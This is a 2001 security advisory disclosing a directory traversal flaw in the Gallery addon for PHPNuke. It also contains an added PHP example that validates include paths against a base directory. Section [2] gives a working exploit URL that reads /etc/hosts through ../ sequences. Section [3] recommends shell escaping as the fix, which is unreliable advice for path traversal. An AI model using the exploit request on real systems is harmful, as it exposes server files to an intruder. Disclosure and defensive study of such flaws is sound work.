iSecureLabs Security Advisory - Cabezon Aurelien has discovered a reverse directory traversal vulnerability in the Gallery Addon for PHPNuke that allows users to view arbitrary files on the remote system that are owned or readable by the httpd daemon.
Gallery Addon for PhpNuke remote file viewing vulnerability
Problem discovered: 18/10/2001 by Cabezon Aurélien
aurelien.cabezon@iSecureLabs.com
[1] Description
Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.
Gallery Addon is vulnerable to the ../.. bug, which allows remote file reading
on the web server with the privileges of whatever user runs the web server.
[2] Exploit
https://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
[3] Fix
Coder has been alerted.
An easy way to fix such a vulnerability is to use the "system escapeshell"
function included with PHP.
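As an added example (not code from this advisory or from Gallery), the sketch below constrains a parameter like the `include` value in section [2] by resolving it against a fixed base directory and rejecting anything that lands outside it. This is a path check rather than the shell-escaping approach mentioned above; the helper name `resolve_include`, the demo directory and the file names are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helper, not Gallery's own code.
// Returns the canonical path of $name inside $baseDir, or null if the
// request is malformed, missing, or resolves outside the base directory.
function resolve_include(string $baseDir, string $name): ?string
{
    // Reject empty names, NUL bytes and absolute paths before touching the filesystem.
    if ($name === '' || strpos($name, "\0") !== false || $name[0] === '/') {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and symlinks; false if the file is missing.
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling
    // directory such as "/base-other" cannot pass as a prefix match.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree: one legitimate include and one file outside the base.
$root = sys_get_temp_dir() . '/gallery_demo_' . getmypid();
mkdir($root . '/html', 0700, true);
file_put_contents($root . '/html/header.inc', "<!-- header -->\n");
file_put_contents($root . '/secret.txt', "outside base\n");

// Constructed sample requests, including the traversal string from section [2].
$requests = ['header.inc', '../secret.txt', '../../../../../../etc/hosts',
             '/etc/hosts', "header.inc\0.jpg"];
foreach ($requests as $r) {
    $path = resolve_include($root . '/html', $r);
    printf("%-36s => %s\n", json_encode($r), $path === null ? 'rejected' : 'allowed');
}

// Clean up the demo tree.
unlink($root . '/html/header.inc');
unlink($root . '/secret.txt');
rmdir($root . '/html');
rmdir($root);
```

Only `header.inc` is allowed; every other request is rejected before any file is opened.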
[4] Information about Gallery Addon for PhpNuke
https://www.menalto.com/projects/gallery-nuke/
Author: bharat@menalto.com
---
Cabezon Aurélien
https://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.